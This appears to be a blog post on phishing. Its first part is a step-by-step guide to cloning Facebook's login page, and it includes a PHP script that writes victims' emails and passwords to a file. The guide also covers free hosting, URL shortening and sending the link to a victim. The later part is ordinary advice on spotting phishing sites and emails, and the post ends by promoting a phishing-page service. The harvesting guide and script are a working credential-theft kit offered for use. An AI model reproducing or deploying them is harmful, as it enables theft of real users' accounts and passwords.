Phishing

PHISHING (HACK FB/AMEZON/FLIPCART) 

Phishing refers to obtaining of confidential data (mainly User Id’s & Passwords) from internet users, typically by sending a link to an unsuspecting user which appears to have been came from an legitamate source but redirects the user to the fake version of the same link.

LETS CREATE A PHISHING WEBSITE FOR HACKING FACEBOOK..

 1) Go to facebook.com

2) right click or press ctrl+u to view source code of site.

3)copy the whole code (ctrl+a)and (ctrl+c)

4)paste it in text editor( used sublime)

5)find action="post"

6)than replace contents in that action=""

7)replace it with action="hack.php" and save it as index.html

8)now copy pate below code and save it as hack.php

<? if(isset($_POST[’email’]) && isset($_POST[‘pass’])) { $password=file_get_contents(‘hack.txt’); $phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”); fclose($file); echo ‘<script>window.location.href=”https://wwww.facebook.com/”</script>’; } else echo ‘<script>window.location.href=”index.html”</script>’; ?>

9)create hack.txt file

10)now upload this all files to any free web hosting site like

 a)my3gb.com

 b)000webhost.com

10)check it by visiting it

11)now encrypt the url or used url shortner to short the url.

12)send it to victim

Recognizing Phishing and Fake Websites

The good news is that you can avoid scams by looking for telltale signs that indicate when a site is fake or an email is phishy. The next time you are not completely confident that you are on a legitimate website or that an email you received is valid, check for these signs:

1) Uses an incorrect URL—If you are used to going to your bank via a regular address and the address of the site you land at is not the same name, you can be confident that you are not at the real site. Always double check to make sure that the site address is accurate.
You can also hover your mouse pointer over a link in the email to verify that the link is directed to the same site that the email came from.
 
2) Asks for banking information—A real bank would never ask for your bank account information or your debit card and PIN numbers via email. Be wary of any email or site that asks for sensitive information (such as your social security number) that is beyond your standard login.

3) Uses a public Internet account—Before you click on any link sent to you by email, take a look at the sender’s email address. If the email is from a public account, but claims to be from your bank or other business, do not trust the email. Moreover, do not trust any email or website that asks you to “confirm” sensitive account information, because this is surely a scam.
 
You should also make sure that any email claiming to be from your bank includes your given name in the message, such as “Dear William Smith,” instead of “Dear Valued Customer.” Real banks address messages to you by name as a way of confirming your relationship.


4) Includes misspelled words—If a bank asks you to log in to your “acccount,” this is pretty good clue that you’ve stumbled upon a phishing email or fake website. Real companies have staff checking the accuracy of emails and website, and a mistake like this would be caught before it was sent or published. If you see a misspelling or a misuse of the company name, look for other mistakes and clues to confirm your suspicions—and don’t enter any of your personal information on the site.


5) Is not a secure site—Legitimate e-commerce sites use encryption, or scrambling, to help insure that your payment information remains safe. You can see if a site uses encryption by looking for a lock symbol in the browser window. Clicking on the lock symbol allows you to verify that a security certificate was issued to that site, a sign that it’s a legitimate, trusted website. You should also check that the address starts with “https://” rather than just “http://”.
Do not enter payment information on any site that isn’t secure.


6) Displays low resolution images—Scammers usually erect fake sites quickly, and this shows in the quality of the sites. If the logo or text appears in poor resolution, this is an important clue that the site could be phony.
Protecting Yourself While these tips will go a long way in helping you identify phishing and fake sites, keep in mind that the scammers are always looking for ways to up their game and make their scams more convincing. It helps to be aware of the mental shortcuts you use and to really take the time to
ask yourself if the site seems legitimate. Here are some ways in which you can avoid being caught in a cybercriminal’s net:

1) Educate yourself—Read up on the latest scams so you know what to lookout for. And be familiar with what a phish looks like so you can recognize common tricks when you see them.

2) Use commonsense—Read your emails carefully, checking to make sure you know the sender, and be suspicious of any email that asks for your personal or financial information. Also be very cautious when downloading any attachments or files from an email, unless you know and trust the sender.

3) Practice smart surfing—When on the web, make sure that the website you’re visiting is secure before you enter any information. If you have any doubts, enter a fake password since phony sites will accept false information. To better protect yourself, you may also want
to use a search engine to help you navigate since they can catch misspellings and prevent you from landing on fake websites. Also, use a search tool such as McAfee® SiteAdvisor®, which indicates in your search results whether sites are safe or not.

4) Use technology to protect you—Comprehensive security software with anti-phishing technologies, like McAfee SecurityCenter, available pre-loaded on DellTM PCs, can help protect you. Just make sure that your software is up to date with the latest security protections by enabling automatic updates or clicking the “update” button on your security software control panel.


5) Be vigilant all the time—You also want to take precautions when you’re offline, such as monitoring your bank and credit card statements for any suspicious charges or transfers. And consider changing your passwords regularly. Make sure you create strong passwords
that use a combination of letters, numbers, and special characters, and that don’t use nicknames, birthdays, or other information that other people may know.

How to identify a phishing e-mail.

1. Company - These e-mails are sent out to thousands of different e-mail addresses and often the person sending these e-mails has no idea who you are. If you have no affiliation with the company the e-mail address is supposedly coming from, it is fake. For example, if the e-mail is coming from Wells Fargo bank but you bank at a different bank.
2. Spelling and grammar - Improper spelling and grammar are almost always a dead giveaway. Look for obvious errors.
3. No mention of account information - If the company were sending you information regarding errors to your account, they would mention your account or username in the e-mail. In the above example, the e-mail just says "eBay customer", if this was eBay they would mention your username.
4. Deadlines - E-mail requests an immediate response or a specific deadline. For example, in the above example, the requirement to log in and change your account information within 24 hours.
5. Links - Although many phishing e-mails are getting better at hiding the true URL you are visiting, often these e-mails will list a URL that is not related to the company's URL. For example, in our above eBay example, "http://fakeaddress.com/ebay" is not an eBay URL, just a URL with an "ebay" directory. If you are unfamiliar with how a URL is structured, see the URL definition for additional information.

What to do if you are not sure if an e-mail is official.

• Never follow any links in an e-mail. Instead of following the link in the e-mail, visit the page by manually typing the address of the company. For example, in the above example, instead of visiting the fake eBay URL, you would type: http://www.ebay.com in your web browser and log in to the official website.
• Never send any personal information through e-mail. If a company is requesting personal information about your account or are saying your account is invalid, visit the web page and log into the account as you normally would.
• Finally, if you are still concerned about your account or are concerned about your personal information, contact the company directly, either through their e-mail address or over the phone.

Issues phishing e-mails commonly address

Below are some of the issues a phishing e-mail may inquire about to trick users.

• Account issues, such as account or password expiring, account being hacked, account out-of-date, or account information needing to be changed.
• Credit card or other personal information, such as credit card expiring or being stolen, incorrect social security number or other personal information, or duplicate credit card or other personal information.
• Confirming orders, such as a request that you log in to confirm recent orders or transactions.

Common companies affected by phishing

Below is a listing of companies phishers most often try to attack.

• Any major bank
• Popular websites such as Amazon, Facebook, MySpace, PayPal, eBay, Microsoft, Apple, Hotmail, YouTube, etc.
• Government: FBI, CIA, IRS, etc.
• Internet service providers such as AOL, Comcast, Cox, MSN, etc.
• Casinos and lottery.
• Online dating or community websites.

CREATE EASY PHISHING PAGES WITH

https://phish5.com

if you like this blog than feel free to share and give your feedback on it.